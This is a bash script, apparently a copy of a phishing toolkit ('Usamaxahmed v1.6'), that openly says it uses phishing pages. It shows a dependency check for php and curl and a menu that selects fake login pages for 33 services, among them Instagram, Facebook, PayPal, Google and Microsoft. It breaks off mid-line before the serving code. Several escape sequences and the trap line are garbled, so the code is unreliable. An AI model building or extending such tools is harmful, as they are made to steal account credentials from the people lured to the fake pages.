#!/bin/bash
# Usamaxahmed v1.6
# Coded by: Usama x Ahmed
# Github: https://github.com/usamaxahmed109/usamaxahmed
# This script uses some Phishing Pages generated by BalochPhish tool (usamaxahmed) (https://github.com/usamaxahmed109/usamaxahmed)


trap 'printf "\;stop;exit 1' 2


dependencies() {

command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Install it. Aborting."; exit 1; }

}

menu() {

printf "\1;92m[\0m\1;77m01\0m\1;92m]\0m\1;92m Instagram\0m      \1;92m[\0m\1;77m17\0m\1;92m]\0m\1;93m IGFollowers\0m   \1;92m[\0m\1;77m33\0m\1;92m]\0m\1;93m Custom    \0m\1;94m \                                
printf "\1;92m[\0m\1;77m02\0m\1;92m]\0m\1;92m Facebook\0m       \1;92m[\0m\1;77m18\0m\1;92m]\0m\1;93m eBay   \0m\
printf "\1;92m[\0m\1;77m03\0m\1;92m]\0m\1;92m Snapchat\0m       \1;92m[\0m\1;77m19\0m\1;92m]\0m\1;93m Pinterest   \0m\
printf "\1;92m[\0m\1;77m04\0m\1;92m]\0m\1;92m Twitter\0m        \1;92m[\0m\1;77m20\0m\1;92m]\0m\1;93m CryptoCurrency   \0m\                
printf "\1;92m[\0m\1;77m05\0m\1;92m]\0m\1;92m Github\0m         \1;92m[\0m\1;77m21\0m\1;92m]\0m\1;93m Verizon   \0m\                
printf "\1;92m[\0m\1;77m06\0m\1;92m]\0m\1;92m Google\0m         \1;92m[\0m\1;77m22\0m\1;92m]\0m\1;93m DropBox   \0m \
printf "\1;92m[\0m\1;77m07\0m\1;92m]\0m\1;92m Spotify\0m        \1;92m[\0m\1;77m23\0m\1;92m]\0m\1;93m Adobe ID   \0m \
printf "\1;92m[\0m\1;77m08\0m\1;92m]\0m\1;92m Netflix\0m        \1;92m[\0m\1;77m24\0m\1;92m]\0m\1;93m Shopify   \0m  \        
printf "\1;92m[\0m\1;77m09\0m\1;92m]\0m\1;92m PayPal\0m         \1;92m[\0m\1;77m25\0m\1;92m]\0m\1;93m Messenger   \0m \         
printf "\1;92m[\0m\1;77m10\0m\1;92m]\0m\1;92m Origin\0m         \1;92m[\0m\1;77m26\0m\1;92m]\0m\1;93m GitLab   \0m    \
printf "\1;92m[\0m\1;77m11\0m\1;92m]\0m\1;92m Steam\0m          \1;92m[\0m\1;77m27\0m\1;92m]\0m\1;93m Twitch   \0m     \
printf "\1;92m[\0m\1;77m12\0m\1;92m]\0m\1;92m Yahoo\0m          \1;92m[\0m\1;77m28\0m\1;92m]\0m\1;93m MySpace   \0m    \
printf "\1;92m[\0m\1;77m13\0m\1;92m]\0m\1;92m Linkedin\0m       \1;92m[\0m\1;77m29\0m\1;92m]\0m\1;93m Badoo   \0m      \
printf "\1;92m[\0m\1;77m14\0m\1;92m]\0m\1;92m Protonmail\0m     \1;92m[\0m\1;77m30\0m\1;92m]\0m\1;93m VK   \0m         \
printf "\1;92m[\0m\1;77m15\0m\1;92m]\0m\1;92m Wordpress\0m      \1;92m[\0m\1;77m31\0m\1;92m]\0m\1;93m Yandex   \0m     \
printf "\1;92m[\0m\1;77m16\0m\1;92m]\0m\1;92m Microsoft\0m      \1;92m[\0m\1;77m32\0m\1;92m]\0m\1;93m devianART   \0m \
read -p $'\[1;92m[\0m\1;77m*\0m\1;92m] Choose an option: \0m\' option


if [[ $option == 1 || $option == 01 ]]; then
server="instagram"
start1

elif [[ $option == 2 || $option == 02 ]]; then
server="facebook"
start1
elif [[ $option == 3 || $option == 03 ]]; then
server="snapchat"
start1
elif [[ $option == 4 || $option == 04 ]]; then
server="twitter"
start1
elif [[ $option == 5 || $option == 05 ]]; then
server="github"
start1
elif [[ $option == 6 || $option == 06 ]]; then
server="google"
start1

elif [[ $option == 7 || $option == 07 ]]; then
server="spotify"
start1

elif [[ $option == 8 || $option == 08 ]]; then
server="netflix"
start1

elif [[ $option == 9 || $option == 09 ]]; then
server="paypal"
start1

elif [[ $option == 10 ]]; then
server="origin"
start1

elif [[ $option == 11 ]]; then
server="steam"
start1

elif [[ $option == 12 ]]; then
server="yahoo"
start1

elif [[ $option == 13 ]]; then
server="linkedin"
start1

elif [[ $option == 14 ]]; then
server="protonmail"
start1

elif [[ $option == 15 ]]; then
server="wordpress"
start1

elif [[ $option == 16 ]]; then
server="microsoft"
start1

elif [[ $option == 17 ]]; then
server="instafollowers"
start1

elif [[ $option == 18 ]]; then
server="shopping"
start1

elif [[ $option == 19 ]]; then
server="pinterest"
start1

elif [[ $option == 20 ]]; then
server="cryptocurrency"
start1

elif [[ $option == 21 ]]; then
server="verizon"
start1

elif [[ $option == 22 ]]; then
server="dropbox"
start1

elif [[ $option == 23 ]]; then
server="adobe"
start1

elif [[ $option == 24 ]]; then
server="shopify"
start1

elif [[ $option == 25 ]]; then
server="messenger"
start1

elif [[ $option == 26 ]]; then
server="gitlab"
start1

elif [[ $option == 27 ]]; then
server="twitch"
start1

elif [[ $option == 28 ]]; then
server="myspace"
start1

elif [[ $option
